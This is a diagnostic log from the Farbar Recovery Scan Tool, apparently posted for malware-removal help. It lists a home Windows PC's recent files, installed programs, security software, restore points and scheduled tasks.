2015-01-13 07:51 - 2012-08-23 07:08 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbGD.sys
2015-01-13 07:51 - 2012-08-23 04:12 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp_winip.dll
2015-01-13 07:51 - 2012-08-23 03:51 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp_winip.dll
2015-01-13 07:49 - 2015-01-14 23:24 - 00000139 _____ () C:\Users\Bonnie\Desktop\SECURITY QUESTIONs.txt
2015-01-12 21:15 - 2015-01-12 21:15 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2015-01-07 09:57 - 2015-01-07 09:57 - 00000000 ____D () C:\ProgramData\pnikjcemimhgahpjiapnjbejoigfkjcj
2015-01-06 19:51 - 2015-01-06 19:51 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\67F23A27.sys
2015-01-06 19:50 - 2015-01-06 19:50 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\12D43959.sys
2015-01-04 10:45 - 2015-01-04 10:45 - 00003886 _____ () C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2015-01-04 10:37 - 2015-01-04 10:38 - 00316504 _____ () C:\Windows\Minidump\010415-35771-01.dmp

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-23 18:10 - 2011-10-06 17:55 - 01064442 _____ () C:\Windows\WindowsUpdate.log
2015-01-23 18:09 - 2014-01-01 14:45 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2015-01-23 18:09 - 2012-12-02 20:12 - 00000000 ___RD () C:\Users\Bonnie\Dropbox
2015-01-23 18:09 - 2012-12-02 20:09 - 00000000 ____D () C:\Users\Bonnie\AppData\Roaming\Dropbox
2015-01-23 18:05 - 2014-11-24 15:22 - 00000000 ____D () C:\ProgramData\Kaspersky Lab
2015-01-23 18:04 - 2009-07-13 21:51 - 00073038 _____ () C:\Windows\setupact.log
2015-01-22 20:29 - 2009-07-13 21:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-22 20:29 - 2009-07-13 21:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-22 20:21 - 2010-11-20 20:47 - 01384912 _____ () C:\Windows\PFRO.log
2015-01-22 20:13 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2015-01-22 19:00 - 2014-10-09 19:57 - 00251904 ___SH () C:\Users\Bonnie\Desktop\Thumbs.db
2015-01-21 23:23 - 2014-07-01 10:06 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-21 22:41 - 2012-05-29 04:19 - 00000000 ____D () C:\Users\Bonnie
2015-01-21 21:54 - 2013-01-02 16:58 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2015-01-20 21:38 - 2009-07-13 22:13 - 00795858 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-16 21:21 - 2012-06-03 08:21 - 00000000 ____D () C:\Users\Bonnie\AppData\Local\Google
2015-01-16 20:59 - 2014-06-11 15:26 - 00000000 ____D () C:\Users\Bonnie\AppData\Roaming\Spotify
2015-01-15 00:05 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-15 00:02 - 2012-06-13 10:34 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-14 23:56 - 2012-06-13 10:34 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-01-14 23:56 - 2012-06-13 10:34 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-01-14 23:56 - 2011-07-20 22:08 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-01-14 23:02 - 2012-05-29 06:07 - 00787980 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2015-01-14 22:55 - 2013-07-14 02:01 - 00000000 ____D () C:\Windows\system32\MRT
2015-01-14 22:34 - 2014-06-11 15:31 - 00000000 ____D () C:\Users\Bonnie\AppData\Local\Spotify
2015-01-13 08:00 - 2009-07-13 20:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-01-13 07:57 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2015-01-13 07:41 - 2014-01-01 15:06 - 00001945 _____ () C:\Windows\epplauncher.mif
2015-01-13 07:39 - 2014-01-26 20:42 - 00000000 ____D () C:\Users\Bonnie\Desktop\Mom RS
2015-01-13 07:39 - 2012-11-26 10:35 - 00000000 ____D () C:\Users\Bonnie\Desktop\Christmas 12
2015-01-13 07:39 - 2012-11-18 12:57 - 00000000 ____D () C:\Users\Bonnie\Desktop\For Jen
2015-01-13 07:39 - 2012-09-09 10:42 - 00000000 ____D () C:\Users\Bonnie\Desktop\August 2012 Ensign
2015-01-10 22:53 - 2012-06-22 16:18 - 00000000 ____D () C:\Users\Bonnie\AppData\Local\CrashDumps
2015-01-08 09:55 - 2010-11-20 20:27 - 00298120 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2015-01-06 19:51 - 2014-07-01 10:06 - 00001109 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-01-06 19:51 - 2014-07-01 10:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-01-06 19:51 - 2014-07-01 10:05 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-01-04 10:37 - 2014-03-18 14:50 - 497851607 _____ () C:\Windows\MEMORY.DMP
2015-01-04 10:37 - 2014-03-18 14:50 - 00000000 ____D () C:\Windows\Minidump
2014-12-31 13:12 - 2012-12-15 11:51 - 113365784 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-12-28 09:58 - 2009-07-13 22:32 - 00000000 ____D () C:\Windows\system32\FxsTmp

==================== Files in the root of some directories =======
2013-03-14 06:09 - 2014-04-07 19:32 - 0000775 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Some content of TEMP:
====================
C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpr4zdmj.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-01-09 14:52

==================== End Of Log ============================

Addition:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-01-2015
Ran by Admin at 2015-01-23 18:12:43
Running from C:\Users\Admin\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Kaspersky Internet Security (Enabled - Up to date) {179979E8-273D-D14E-0543-2861940E4886}
AS: Kaspersky Internet Security (Enabled - Up to date) {ACF8980C-0107-DEC0-3FF3-1313EF89023B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky Internet Security (Enabled) {2FA2F8CD-6D52-D016-2E1C-81546ADD0FFD}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.7.0.19480 - Adobe Systems Incorporated)
Adobe Flash Player 16 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 16.0.0.257 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.257 - Adobe Systems Incorporated)
Adobe Reader X (10.1.13) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.13 - Adobe Systems Incorporated)
Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI AVIVO64 Codecs (Version: 10.12.0.00210 - ATI Technologies Inc.) Hidden
ATI Catalyst Install Manager (HKLM\...\{CADBC192-932B-EC76-510D-4012A33C5E20}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Brother MFL-Pro Suite DCP-7065DN (HKLM-x32\...\{3ACCCFB3-7B17-4E9F-ACB0-46868FCD4487}) (Version: 1.1.3.0 - Brother Industries, Ltd.)
Build-a-lot 4 - Power Source (x32 Version: 2.2.0.97 - WildTangent) Hidden
CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.0.1 - Canon Inc.)
CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.8.0.1 - Canon Inc.)
Canon Internet Library for ZoomBrowser EX (HKLM-x32\...\Canon Internet Library for ZoomBrowser EX) (Version: 1.7.0.1 - Canon Inc.)
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.6.0.5 - Canon Inc.)
Canon Utilities ImageBrowser EX (HKLM-x32\...\ImageBrowser EX) (Version: 1.5.0.6 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.6.0.23 - Canon Inc.)
ccc-core-static (x32 Version: 2010.0210.2206.39615 - ATI) Hidden
Chronicles of Albian (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
CyberLink MediaEspresso (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.1720_38230 - CyberLink Corp.)
CyberLink PowerDVD 10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.2531.52 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dropbox (HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Dropbox) (Version: 3.0.3 - Dropbox, Inc.)
eBay Worldwide (HKLM-x32\...\{D3E5A972-9A15-427D-AE78-8181A5FD943C}) (Version: 2.2.0409 - OEM)
ERUNT 1.1j (HKLM-x32\...\ERUNT_is1) (Version:  - Lars Hederer)
FamilySearch Indexing 3.13.1 (HKLM-x32\...\0591-8077-9297-0833) (Version: 3.13.1 - FamilySearch)
Final Drive: Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Gateway Games (HKLM-x32\...\WildTangent gateway Master Uninstall) (Version: 1.0.2.5 - WildTangent)
Gateway Recovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 5.00.3502 - Gateway Incorporated)
Gateway Registration (HKLM-x32\...\Gateway Registration) (Version: 1.04.3503 - Gateway Incorporated)
Gateway ScreenSaver (HKLM-x32\...\Gateway Screensaver) (Version: 1.1.0225.2011 - Gateway Incorporated)
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hotkey Utility (HKLM-x32\...\Hotkey Utility) (Version: 2.05.3505 - Gateway Incorporated)
HP LaserJet 1020 Series (HKLM\...\HP LaserJet 1020 Series) (Version:  - )
HP Support Solutions Framework (HKLM-x32\...\{23CCE784-A812-4647-AEFF-1DCCD4E57478}) (Version: 11.50.0000 - Hewlett-Packard Company)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3501 - Gateway Incorporated)
iTunes (HKLM\...\{D601CEAD-2E4F-4BBB-85CC-C29A4CE6A3C0}) (Version: 11.1.3.8 - Apple Inc.)
Jewel Match 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kaspersky Internet Security (HKLM-x32\...\InstallWIX_{6F6873E3-5C92-4049-B511-231A138DD090}) (Version: 14.0.0.4651 - Kaspersky Lab)
Kaspersky Internet Security (x32 Version: 14.0.0.4651 - Kaspersky Lab) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Web Publishing Wizard 1.52 (HKLM-x32\...\WebPost) (Version:  - )
Mozilla Firefox 35.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 35.0 (x86 en-US)) (Version: 35.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 30.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Mystery of Mortlake Mansion (x32 Version: 2.2.0.98 - WildTangent) Hidden
NEF Codec (HKLM-x32\...\{D6506521-0959-4FA3-875F-E2E28830B0D2}) (Version: 1.00.0000 - Nikon)
Nero BackItUp 10 (HKLM-x32\...\{68AB6930-5BFF-4FF6-923B-516A91984FE6}) (Version: 5.8.11000.8.100 - Nero AG)
Nero DiscSpeed 10 (HKLM-x32\...\{34490F4E-48D0-492E-8249-B48BECF0537C}) (Version: 6.2.10500.2.100 - Nero AG)
Nero Express 10 (HKLM-x32\...\{70550193-1C22-445C-8FA4-564E155DB1A7}) (Version: 10.6.10700.5.100 - Nero AG)
Nero Multimedia Suite 10 Essentials (HKLM-x32\...\{62BF4BD3-B1F6-4FA2-8388-CC0647ACBF86}) (Version: 10.5.10300 - Nero AG)
Nero Multimedia Suite 10 Essentials (HKLM-x32\...\{68AFA3A7-9265-4ABD-994A-ACA413E3715C}) (Version: 10.6.10300 - Nero AG)
Nero RescueAgent 10 (HKLM-x32\...\{E337E787-CF61-4B7B-B84F-509202A54023}) (Version: 3.6.10500.3.100 - Nero AG)
Nero StartSmart 10 (HKLM-x32\...\{F61D489E-6C44-49AC-AD02-7DA8ACA73A65}) (Version: 10.2.11600.14.100 - Nero AG)
Nero Update (HKLM-x32\...\{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}) (Version: 1.0.10900.31.0 - Nero AG)
NOOK for PC (HKLM-x32\...\BN_DesktopReader) (Version: 2.5.4.7070 - Barnesandnoble.com)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
Nuance PaperPort 12 (HKLM-x32\...\{6C0A559F-8583-4B5A-8B50-20BEE15D8E64}) (Version: 12.1.0000 - Nuance Communications, Inc.)
Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
OLYMPUS Raw Codec (HKLM\...\{0136EF84-8660-4FE0-A9E5-F052F6230085}) (Version: 1.3.0 - OLYMPUS IMAGING CORP.)
PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 1.00.0001 - Nuance Communications, Inc.)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
Personal Ancestral File 5  Lessons (HKLM-x32\...\{62C71C1B-E0FB-11D4-9DB7-00B0D02AE94A}) (Version:  - )
Personal Ancestral File 5 (HKLM-x32\...\{D94A8E22-DF2B-4107-9E51-608A60A7671D}) (Version:  - )
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6045 - Realtek Semiconductor Corp.)
Reference Point Software Template for APA format, Word 2010 (HKLM-x32\...\Reference Point Software Template for APA format, Word 2010) (Version:  - Reference Point Software, LLC)
Reference Point Template ver: Word 2010, APA 6th Ed. (HKLM-x32\...\Reference Point Template ver: Word 2010, APA 6th Ed.) (Version:  - Reference Point Software, LLC)
RootsMagic 6.3.0.2 (HKLM-x32\...\{94433E0D-764C-4964-AD0B-EC46BCA7E68E}_is1) (Version: RootsMagic 6.3.0.2 - RootsMagic, Inc.)
Scansoft PDF Professional (x32 Version:  - ) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Spotify) (Version: 0.9.15.27.g87efe634 - Spotify AB)
The Print Shop 23.1 (HKLM-x32\...\{0C8C6F56-41FA-44F6-8107-DCFAA7EFD601}) (Version: 23.1.11 - Broderbund Software)
Torchlight (x32 Version: 2.2.0.97 - WildTangent) Hidden
TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)
TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Virtual Villagers 5 - New Believers (x32 Version: 2.2.0.97 - WildTangent) Hidden
VirusTotal Uploader 2.2 (HKLM-x32\...\VTUploader) (Version:  - )
Welcome Center (HKLM-x32\...\Gateway Welcome Center) (Version: 1.02.3503 - Gateway Incorporated)
WildTangent Games App (Gateway Games) (x32 Version: 4.0.5.14 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Zuma's Revenge (x32 Version: 2.2.0.97 - WildTangent) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)

==================== Restore Points  =========================

29-12-2014 21:47:33 Windows Update
03-01-2015 06:23:04 Windows Update
07-01-2015 09:49:21 Windows Update
10-01-2015 14:16:34 Windows Update
13-01-2015 07:50:59 Windows Update
14-01-2015 22:39:23 Windows Update
14-01-2015 23:09:50 Configured MediaEspresso
20-01-2015 21:41:41 Windows Update
22-01-2015 19:59:43 zoek.exe restore point

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2009-06-10 14:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {080569E1-7812-4D07-BD89-164319B63ADF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2977827394-2594518940-965070511-1000Core => C:\Users\Bonnie\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {11A35764-0770-462F-856B-741BA62F537E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {224B946F-8456-4B76-B6A5-CC5D802F83D2} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\WSCStub.exe
Task: {3CA658F8-E3B3-4EB7-8889-0C7EE17102AB} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {3E4DBC7D-7F19-4D96-BC4B-4539E3201C58} - \Norton Internet Security\Norton Error Analyzer No Task File <==== ATTENTION
Task: {49D6DDAB-C1DA-4CAB-ABB0-B346C725F9F3} - System32\Tasks\{D210C445-0250-4759-AEB7-787BE3B1C577} => pcalua.exe -a D:\Setup\LaunchSetup.exe -d D:\Setup
Task: {5F41B5CA-1D7B-46DE-8112-260AD0CBCCF9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-01-14] (Adobe Systems Incorporated)
Task: {811FB071-70B5-4AA1-A228-2EEFA94CE325} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {81EC917C-266D-4D73-9506-EA361552C835} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {843A4CE9-82B3-42B0-B696-F1EE6456F48C} - System32\Tasks\Adobe ARM => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {8A65DC9B-EA75-4DE2-A67D-E83BBBB4F4AC} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2011-05-20] (CyberLink)
Task: {93ABE615-7CD5-4ABE-8AF6-5B7FC1E12E8A} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2977827394-2594518940-965070511-1000UA => C:\Users\Bonnie\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {9F710099-5E65-4EDD-BDFF-E30C2A2FE32F} - System32\Tasks\NBAgent => C:\Program Files (x86)\Nero\Nero 10\Nero BackItUp\NBAgent.exe [2011-07-05] (Nero AG)
Task: {BEFC35EC-1BF3-43CA-B976-D6A8705252FC} - System32\Tasks\Adobe Reader Speed Launcher => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [2014-12-03] (Adobe Systems Incorporated)
